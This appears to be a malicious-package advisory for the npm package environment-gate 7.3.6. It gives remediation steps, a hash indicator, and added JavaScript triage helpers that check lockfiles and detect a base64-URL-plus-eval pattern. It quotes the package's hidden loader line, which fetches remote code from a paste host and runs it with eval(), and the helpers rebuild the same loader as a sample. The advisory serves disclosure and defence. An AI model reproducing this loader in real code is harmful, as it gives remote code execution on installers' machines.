Malicious package

environment-gate (npm)

Malicious code in environment-gate (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5743

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall environment-gate

What this malware does

The package's only export, gate(), performs an HTTP GET to a base64-obfuscated URL (https://www.jsonkeeper.com/b/VKUNI) and passes the response body directly to eval(). The destination is an anonymous, mutable JSON paste host whose contents the author can change at any moment, so any caller of the documented gate() API executes arbitrary remote JavaScript in the installer's Node.js process: full remote code execution. The base64 wrapping of the URL, the cover-story description ('utility to await multiple asynchronous calls'), the missing repo, the empty author field, and the single-file payload are consistent with a throwaway malicious package.

The relevant code is index.js line 2: require('axios').get(atob('...')).then(r => {eval(r.data.content)})

Malicious versions

1 flagged
7.3.6
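
One way to triage for this package, as an added example that is not part of the advisory or the package's code: findFlagged checks a parsed package-lock.json for the flagged version, and remoteEvalIndicators flags source with the loader shape described above (a base64 literal that decodes to a URL, plus eval). The function names, the placeholder URL and the sample lockfile are constructed for illustration.

```javascript
// Added example: triage helpers for the pattern this advisory describes.
const FLAGGED = { name: 'environment-gate', versions: ['7.3.6'] }; // values from the advisory

// Walk a parsed package-lock.json: v2/v3 "packages" map, or v1 nested "dependencies".
function findFlagged(lock) {
  const hits = [];
  const check = (name, meta, path) => {
    if (name === FLAGGED.name && FLAGGED.versions.includes(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  };
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      check(meta.name || path.split('node_modules/').pop(), meta, path);
    }
  } else {
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        check(name, meta, `${trail}/${name}`);
        walk(meta.dependencies, `${trail}/${name}`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// Heuristic for the loader shape: a base64 literal that decodes to a URL,
// in a file that also executes strings via eval() or new Function().
function remoteEvalIndicators(src) {
  const decodedUrls = [];
  const b64 = /(?:atob|Buffer\.from)\(\s*['"`]([A-Za-z0-9+/=]{8,})['"`]/g;
  for (const m of src.matchAll(b64)) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\//i.test(text)) decodedUrls.push(text);
  }
  const dynamicExec = /\beval\s*\(|\bnew\s+Function\s*\(/.test(src);
  return { decodedUrls, dynamicExec, suspicious: decodedUrls.length > 0 && dynamicExec };
}

// Constructed inputs (not taken from the real package or a real project).
const PLACEHOLDER_URL = 'https://paste.example/b/PLACEHOLDER';
const SAMPLE_SRC =
  `require('axios').get(atob('${btoa(PLACEHOLDER_URL)}')).then(r => {eval(r.data.content)})`;
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  '': { name: 'demo-app', version: '1.0.0' },
  'node_modules/some-lib/node_modules/environment-gate': { version: '7.3.6' },
} };
console.log(findFlagged(SAMPLE_LOCK), remoteEvalIndicators(SAMPLE_SRC));
```

A heuristic match from remoteEvalIndicators is a lead for manual review; the lockfile check is the authoritative test for the flagged version.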

Indicators of compromise (SHA-256)

48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1

Frequently asked questions

No. environment-gate on npm has been identified as a malicious package (version 7.3.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006373

Credits

  • Amazon Inspector · finder
